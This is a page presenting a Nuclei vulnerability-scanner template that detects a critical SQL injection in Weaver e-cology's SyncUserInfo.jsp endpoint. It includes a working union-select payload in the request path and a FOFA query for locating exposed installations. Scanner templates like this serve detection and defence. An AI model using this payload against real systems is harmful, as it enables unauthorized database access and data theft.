Skip to content

Ecology Syncuserinfo - SQL Injection

ID: ecology-syncuserinfo-sqli

Severity: critical

Author: ritikchaddha

Tags: ecology,sqli

Ecology Syncuserinfo contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

id: ecology-syncuserinfo-sqli
info:
name: Ecology Syncuserinfo - SQL Injection
author: ritikchaddha
severity: critical
description: Ecology Syncuserinfo contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.weaver.com.cn/
- https://github.com/chaitin/xray/blob/master/pocs/ecology-syncuserinfo-sqli.yml
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
max-request: 1
fofa-query: app="泛微-协同办公OA"
product: e-cology
vendor: weaver
tags: ecology,sqli
http:
- method: GET
path:
- "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "4386499557"
- type: status
status:
- 200
# digest: 4b0a00483046022100c7ae32645f9d60ee129bb94cf2471019213a369066ee75d465d5ba799ffa2390022100e234b259e9a861e3b2b7c8a00ec104ae1d40987e5da33ac8538adbe740f218ca:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml"

View on Github